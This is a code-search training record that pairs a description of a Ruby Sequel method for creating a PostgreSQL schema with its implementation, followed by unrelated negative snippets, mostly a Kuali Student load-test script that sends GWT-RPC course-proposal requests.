{\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|7|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|F189A2C8AED6D8071F8F9362674CF016|org.kuali.student.core.document.ui.client.service.DocumentRpcService|getRefDocIdsForRef|java.lang.String/2004016611|kuali.org.RefObjectType.ProposalInfo|%%_#{opts[:proposal_dyn_var_name]}%%|1|2|3|4|2|5|5|6|7|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n\n if(!opts[:collaborator].nil?)\n contents1 = \"5|0|194|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|validate|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|3|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, 
Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|2|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|4|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|6|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|8|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators|action|F|actionRequestId|%%_#{opts[:action_request_id_name]}%%|actionRequestStatus|Active|author|canRevokeRequest|firstName|#{opts[:collaborator]}|lastName|permission|KS-SYS~Edit Document|principalId\"\n contents2 = 
\"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491070679|1309965025280|959000000|8|40|14|59|8|41|38|39|3491081941|1309965025280|221000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491076835|1309965025280|115000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491067152|1309965025280|432000000|8|40|14|59|8|41|38|39|3491081913|1309965025280|193000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491067143|1309965025280|423000000|8|40|14|59|8|41|38|39|3491081907|1309965025280|187000000|8\"\n contents3 = 
\"|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491062523|1309965025280|803000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|136|-1|-448|8|137|10|-5|8|138|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|139|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|140|8|30|14|141|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491076834|1309965025280|114000000|8|40|14|59|8|41|38|39|3491081856|1309965025280|136000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|142|10|-5|8|143|14|144|8|46|14|62|8|145|14|146|8|123|17|5|6|7|0|2|18|-15|14|147|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|148|-535|-537|-529|-533|-1|-527|8|149|14|150|8|48|14|151|8|120|17|5|6|7|0|2|18|-15|14|152|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|153|-555|-557|-549|-553|-1|-547|8|154|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|155|17|5|6|7|0|0|-1|-579|8|156|17|5|6|7|0|3|8|157|38|39|3491062523|1309965025280|803000000|8|158|89|90|1|0|8|159|14|160|-1|-583|8|21|17|5|6|7|0|3|8|143|17|5|6|7|0|1|8|22|14|161|-597|-599|8|145|17|5|6|7|0|1|8|22|14|146|-597|-605|8|13|17|5|6|7|0|1|8|22|14|162|-597|-611|-1|-595|8|163|17|5|6|7|0|12|8|164|14|165|8|30|14|166|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3491062758|1309965025280|38000000|8|40|14|59|8|41|38|39|3491082765|1309965025280|45000000|8|42|14|167|-619|-625|8|44|14|65|8|168|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|169|14|170|8|171|17|5|6|7|0|0|-619|-651|8|172|17|5|6|7|0|0|-619|-655|8|173|14|174|8|46|14|175|8|48|14|176|8|177|14|178|-1|-617|8|179|17|5|6|7|0|1|8|180|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|181|14|182|8|183|14|184|8|185|14|186|8|187|10|-5|8|188|10|11|1|8|189|14|190|8|191|14|190|8|192|14|193|8|194|14|190|-673|-675|-669|-671|-1|-667|0|0|\"\n else\n contents1 = 
\"5|0|180|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|1ED48DA6F48F82765FE7B58378EA94E0|org.kuali.student.lum.lu.ui.course.client.service.CourseRpcService|validate|org.kuali.student.common.assembly.data.Data/3184510345|org.kuali.student.common.assembly.data.Data|java.util.LinkedHashMap/1551059846|org.kuali.student.common.assembly.data.Data$StringKey/758802082|passFail|org.kuali.student.common.assembly.data.Data$BooleanValue/4261226833|java.lang.Boolean/476441737|audit|finalExamStatus|org.kuali.student.common.assembly.data.Data$StringValue/3151113388|STD|campusLocations|org.kuali.student.common.assembly.data.Data$DataValue/1692468409|org.kuali.student.common.assembly.data.Data$IntegerKey/134469241|java.lang.Integer/3438268394|AL|_runtimeData|id-translation|All|code|#{opts[:subject_area]}#{opts[:course_suffix]}|courseNumberSuffix|#{opts[:course_suffix]}|courseSpecificLOs|loCategoryInfoList|id|%%_#{opts[:lo_category_id_var_name]}%%|loRepository|kuali.loRepository.key.singleUse|metaInfo|createId|admin|createTime|org.kuali.student.common.assembly.data.Data$DateValue/2929953165|java.sql.Timestamp/1769758459|updateId|updateTime|versionInd|0|name|#{opts[:lo_category]}|state|active|type|loCategoryType.subject|loDisplayInfoList|loInfo|sequence|desc|formatted|#{opts[:lo_cat_text]}|plain|%%_#{opts[:lo_category_var_name]}%%|loRepositoryKey|#{opts[:propose_person]}|3|SINGLE USE LO|draft|kuali.lo.type.singleUse|courseTitle|#{opts[:course_title]}|creditOptions|fixedCreditValue|10.0|kuali.creditType.credit.degree.10.0|resultValues|kuali.resultComponentType.credit.degree.fixed|Credits, Fixed|crossListings|descr|#{opts[:course_description]}|duration|atpDurationTypeKey|kuali.atp.duration.Semester|timeQuantity|org.kuali.student.common.assembly.data.Data$IntegerValue/3605481012|Semester|effectiveDate|expenditure|affiliatedOrgs|%%_#{opts[:affliated_orgs_id_name]}%%|orgId|%%_#{opts[:admin_dep_var_name]}%%|percentage|org.kuali.student.common.assembly.data.Data$LongValue/3784756947|java.lang.Long/4227064769|#{admin_org}|fees|feeAmounts|currencyQuantity|currencyTypeKey|kuali.currency.type.usdollars.cents|feeType|kuali.enum.type.feeTypes.labFee|%%_#{opts[:lab_fee_id_name]}%%|2|rateType|fixedRateFee|Fixed Rate Fee|Laboratory Fee|formats|activities|activityType|kuali.lu.type.activity.Lab|contactHours|unitQuantity|5|unitType|kuali.atp.duration.week|per week|defaultEnrollmentEstimate|kuali.atp.duration.Week|Week|%%_#{opts[:atp_duration_week_var_name]}%%|4|unitsContentOwner|Lab|%%_#{opts[:lab_var_name]}%%|termsOffered|kuali.lu.type.CreditCourseFormatShell|gradingOptions|kuali.resultComponent.grade.letter|Letter|%%_#{opts[:clu_ref_dyn_var_name]}%%|instructors|personId|#{opts[:instructor]}|#{opts[:instructor]}, #{opts[:instructor]}(#{opts[:instructor]})|joints|level|100|6|pilotCourse|revenues|%%_#{opts[:revenues_id_name]}%%|REVENUE|%%_#{opts[:revenue_id_name]}%%|specialTopicsCourse|startTerm|kuali.atp.FA2008-2009|subjectArea|#{opts[:subject_area]}|kuali.atp.season.Any|Any|transcriptTitle|#{opts[:course_short_title]}|kuali.lu.type.CreditCourse|#{opts[:oversight_dept_number]}|#{oversight_department}|unitsDeployment|variations|versionInfo|currentVersionStart|sequenceNumber|versionIndId|%%_#{opts[:version_ind_id_name]}%%|Fall Semester of 2008|Standard final 
Exam|proposal|workflowNode|PreRoute|%%_#{opts[:proposal_dyn_var_name]}%%|8|proposalReference|proposalReferenceType|kuali.proposal.referenceType.clu|proposerOrg|proposerPerson|rationale|#{opts[:course_rationale]}|Saved|kuali.proposal.type.course.create|workflowId|%%_#{opts[:proposal_doc_id_var_name]}%%|collaboratorInfo|collaborators\"\n contents2 = \"|1|2|3|4|1|5|5|6|7|0|38|8|9|10|11|0|8|12|10|-5|8|13|14|15|8|16|17|5|6|7|0|2|18|19|0|14|20|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|23|-19|-21|-12|-17|-1|-10|8|24|14|25|8|26|14|27|8|28|17|5|6|7|0|1|18|-15|17|5|6|7|0|3|8|29|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|30|14|31|8|32|14|33|8|34|17|5|6|7|0|5|8|35|14|36|8|37|38|39|3759152200|1288490188800|0|8|40|14|36|8|41|38|39|3759152200|1288490188800|0|8|42|14|43|-45|-51|8|44|14|45|8|46|14|47|8|48|14|49|-41|-43|-37|-39|8|50|17|5|6|7|0|0|-37|-73|8|51|17|5|6|7|0|8|8|52|14|43|8|53|17|5|6|7|0|2|8|54|14|55|8|56|14|55|-79|-83|8|30|14|57|8|58|14|33|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498783321|1309965025280|601000000|8|40|14|59|8|41|38|39|3498791687|1309965025280|967000000|8|42|14|60|-79|-95|8|44|14|61|8|46|14|62|8|48|14|63|-37|-77|-33|-35|-1|-31|8|64|14|65|8|66|17|5|6|7|0|1|18|-15|17|5|6|7|0|7|8|67|14|68|8|30|14|69|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3479039543|1309965025280|823000000|8|40|14|59|8|41|38|39|3479039543|1309965025280|823000000|8|42|14|43|-125|-131|8|70|17|5|6|7|0|1|18|-15|14|68|-125|-147|8|46|14|62|8|48|14|71|8|21|17|5|6|7|0|1|8|48|17|5|6|7|0|1|8|22|14|72|-159|-161|-125|-157|-121|-123|-1|-119|8|73|17|5|6|7|0|0|-1|-167|8|74|17|5|6|7|0|1|8|56|14|75|-1|-171|8|76|17|5|6|7|0|3|8|77|14|78|8|79|80|19|2|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|81|-188|-190|-179|-186|-1|-177|8|82|38|39|470887936|1219770712064|0|8|83|17|5|6|7|0|1|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|85|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-220|-222|-209|-218|-205|-207|-201|-203|-1|-199|8|92|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|93|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|94|80|19|100|8|95|14|96|-238|-240|-234|-236|8|97|14|98|8|30|14|99|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498789104|1309965025280|384000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|100|-234|-253|8|101|14|102|8|21|17|5|6|7|0|2|8|101|17|5|6|7|0|1|8|22|14|103|-273|-275|8|97|17|5|6|7|0|1|8|22|14|104|-273|-281|-234|-271|-230|-232|-1|-228|8|105|17|5|6|7|0|1|18|-15|17|5|6|7|0|6|8|106|17|5|6|7|0|1|18|-15|17|5|6|7|0|9|8|107|14|108|8|109|17|5|6|7|0|3|8|110|14|111|8|112|14|113|8|21|17|5|6|7|0|1|8|112|17|5|6|7|0|1|8|22|14|114|-315|-317|-307|-313|-301|-305|8|115|80|-246|8|76|17|5|6|7|0|3|8|77|14|116|8|79|80|19|13|8|21|17|5|6|7|0|1|8|77|17|5|6|7|0|1|8|22|14|117|-336|-338|-327|-334|-301|-325|8|30|14|118|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498779786|1309965025280|66000000|8|40|14|59|8|41|38|39|3498791652|1309965025280|932000000|8|42|14|119|-301|-346|8|46|14|62|8|120|17|5|6|7|0|0|-301|-364|8|21|17|5|6|7|0|1|8|107|17|5|6|7|0|1|8|22|14|121|-370|-372|-301|-368|-297|-299|-293|-295|8|30|14|122|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498779778|1309965025280|58000000|8|40|14|59|8|41|38|39|3498791646|1309965025280|926000000|8|42|14|119|-293|-380|8|46|14|62|8|123|17|5|6|7|0|0|-293|-398|8|48|14|124|-289|-291|-1|-287|8|125|17|5|6|7|0|2|18|-15|14|126|8|21|17|5|6\"\n contents3 = 
\"|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|127|-412|-414|-406|-410|-1|-404|8|30|14|128|8|129|17|5|6|7|0|1|18|-15|17|5|6|7|0|2|8|130|14|131|8|21|17|5|6|7|0|1|8|130|17|5|6|7|0|1|8|22|14|132|-434|-436|-428|-432|-424|-426|-1|-422|8|133|17|5|6|7|0|0|-1|-442|8|134|14|135|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498775348|1309965025280|628000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|136|-1|-448|8|137|10|-5|8|138|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|84|17|5|6|7|0|1|18|-15|17|5|6|7|0|4|8|30|14|139|8|86|14|87|8|88|89|90|100|0|8|21|17|5|6|7|0|1|8|86|17|5|6|7|0|1|8|22|14|91|-491|-493|-480|-489|-476|-478|-472|-474|8|97|14|140|8|30|14|141|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498789104|1309965025280|384000000|8|40|14|59|8|41|38|39|3498791612|1309965025280|892000000|8|42|14|100|-472|-503|-468|-470|-1|-466|8|142|10|-5|8|143|14|144|8|46|14|62|8|145|14|146|8|123|17|5|6|7|0|2|18|-15|14|147|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|148|-535|-537|-529|-533|-1|-527|8|149|14|150|8|48|14|151|8|120|17|5|6|7|0|2|18|-15|14|152|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|153|-555|-557|-549|-553|-1|-547|8|154|17|5|6|7|0|2|18|-15|14|87|8|21|17|5|6|7|0|1|18|-15|17|5|6|7|0|1|8|22|14|91|-571|-573|-565|-569|-1|-563|8|155|17|5|6|7|0|0|-1|-579|8|156|17|5|6|7|0|3|8|157|38|39|3498775348|1309965025280|628000000|8|158|89|90|1|0|8|159|14|160|-1|-583|8|21|17|5|6|7|0|3|8|143|17|5|6|7|0|1|8|22|14|161|-597|-599|8|145|17|5|6|7|0|1|8|22|14|146|-597|-605|8|13|17|5|6|7|0|1|8|22|14|162|-597|-611|-1|-595|8|163|17|5|6|7|0|12|8|164|14|165|8|30|14|166|8|34|17|5|6|7|0|5|8|35|14|59|8|37|38|39|3498775596|1309965025280|876000000|8|40|14|59|8|41|38|39|3498792455|1309965025280|735000000|8|42|14|167|-619|-625|8|44|14|65|8|168|17|5|6|7|0|1|18|-15|14|128|-619|-643|8|169|14|170|8|171|17|5|6|7|0|0|-619|-651|8|172|17|5|6|7|0|0|-619|-655|8|173|14|174|8|46|14|175|8|48|14|176|8|177|14|178|-1|-617|8|179|17|5|6|7|0|1|8|180|17|5|6|7|0|0|-669|-671|-1|-667|0|0|\"\n end\n \n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/CreditCourseProposalRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"#{contents1}#{contents2}#{contents3}\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add_thinktime(5)\n\n\n # Submit to worflow\n if(opts[:submit])\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|submitDocumentWithId|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => \"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getActionsRequested|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n\n @request.add('/org.kuali.student.lum.lu.ui.main.LUMMain/rpcservices/WorkflowRpcService',\n {\n 'method' => 'POST',\n 'content_type' => 'text/x-gwt-rpc; charset=utf-8',\n 'contents' => 
\"5|0|6|#{@request.url}/org.kuali.student.lum.lu.ui.main.LUMMain/|71417C94A72A0CF76A43A2B36B8E3E1B|org.kuali.student.core.workflow.ui.client.service.WorkflowRpcService|getDocumentStatus|java.lang.String/2004016611|%%_#{opts[:proposal_doc_id_var_name]}%%|1|2|3|4|1|5|6|\"\n },\n {\n 'subst' => 'true'\n }\n )\n end\n \n \n end",
"def call(_obj, args, _ctx)\n create_table = Table.new(\n name: args[:name],\n quantity: args[:quantity],\n )\n return create_table if create_table.save\n GraphQL::ExecutionError.new(\"invalid data\")\n end"
] |
[
"0.7619942",
"0.6248246",
"0.62357014",
"0.6163669",
"0.584984",
"0.5509536",
"0.53380984",
"0.5277645",
"0.5253506",
"0.52450913",
"0.51921475",
"0.5182267",
"0.51447105",
"0.50993854",
"0.50829625",
"0.5075793",
"0.5061333",
"0.5004424",
"0.5002058",
"0.5002025",
"0.49873585",
"0.49818942",
"0.49179366",
"0.4885991",
"0.48857856",
"0.48817885",
"0.48758706",
"0.48546708",
"0.48505613",
"0.48435307",
"0.48388478",
"0.48273984",
"0.48180926",
"0.4808999",
"0.48026067",
"0.48005655",
"0.47836033",
"0.47801012",
"0.47783968",
"0.47757152",
"0.47748348",
"0.47721782",
"0.47600976",
"0.4750046",
"0.47382045",
"0.47301733",
"0.47262704",
"0.47237578",
"0.470314",
"0.4678737",
"0.46637592",
"0.46630535",
"0.46387124",
"0.46338248",
"0.46327725",
"0.46191302",
"0.46041375",
"0.45979607",
"0.45965225",
"0.4594864",
"0.45880434",
"0.45845386",
"0.45776516",
"0.45653093",
"0.45544195",
"0.45533323",
"0.4553206",
"0.45465216",
"0.45437902",
"0.45431778",
"0.4532851",
"0.4531046",
"0.45264316",
"0.4523669",
"0.45235598",
"0.4497907",
"0.4497907",
"0.44947562",
"0.44929785",
"0.44896805",
"0.44893065",
"0.44885492",
"0.4487874",
"0.44789454",
"0.44695464",
"0.446927",
"0.44592237",
"0.44576445",
"0.44488746",
"0.44480917",
"0.44460526",
"0.44399783",
"0.44327098",
"0.44294077",
"0.4427759",
"0.44042307",
"0.44030744",
"0.4400796",
"0.4399003",
"0.43906564"
] |
0.7850673
|
0
|
Create a schema in the database. Arguments:
name :: Name of the schema (e.g. admin)
opts :: options hash:
        :if_not_exists :: Don't raise an error if the schema already exists (PostgreSQL 9.3+)
        :owner :: The owner to set for the schema (defaults to current user if not specified)
|
def create_schema(name, opts=OPTS)
self << create_schema_sql(name, opts)
end
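
A minimal usage sketch, assuming a Sequel Database handle DB connected to PostgreSQL; the option names follow the description above, and the generated SQL matches create_schema_sql:

DB.create_schema(:admin)                          # CREATE SCHEMA "admin"
DB.create_schema(:admin, if_not_exists: true)     # no error if it already exists (PostgreSQL 9.3+)
DB.create_schema(:reporting, owner: :report_user) # CREATE SCHEMA "reporting" AUTHORIZATION "report_user"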
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema_sql(name, opts = {})\n \"CREATE SCHEMA #{quote_identifier(name)}\"\n end",
"def create_schema schema_name\n execute \"CREATE SCHEMA #{quote_schema_name(schema_name)}\"\n end",
"def create_schema(name)\n sql = %{CREATE SCHEMA \"#{name}\"}\n ActiveRecord::Base.connection.execute sql\n end",
"def create_database(name, _options = {})\n execute(\"CREATE SCHEMA `#{name}`\")\n end",
"def create_schema(schema_name, pg_username = nil)\n if pg_username.nil? # AR 4.0 compatibility - accepts only single argument\n execute \"CREATE SCHEMA #{schema_name}\"\n else\n execute(\"CREATE SCHEMA \\\"#{schema_name}\\\" AUTHORIZATION \\\"#{pg_username}\\\"\")\n end\n end",
"def create_database(name, options = {})\n execute(\n \"CREATE SCHEMA #{quote_table_name(name)}\",\n SCHEMA_LOG_NAME\n )\n end",
"def create_schema(schema)\n execute \"CREATE SCHEMA #{schema}\", 'Create Schema'\n end",
"def create!(db, colls = nil)\n db.in_transaction do |conn|\n raise StandardError.new(\"Schema #{name} already created!\") unless schema_tables(conn).empty?\n end\n\n osm2pgsql_exec db, \"'#{empty_file}'\", \"creating osm2pgsql schema\"\n end",
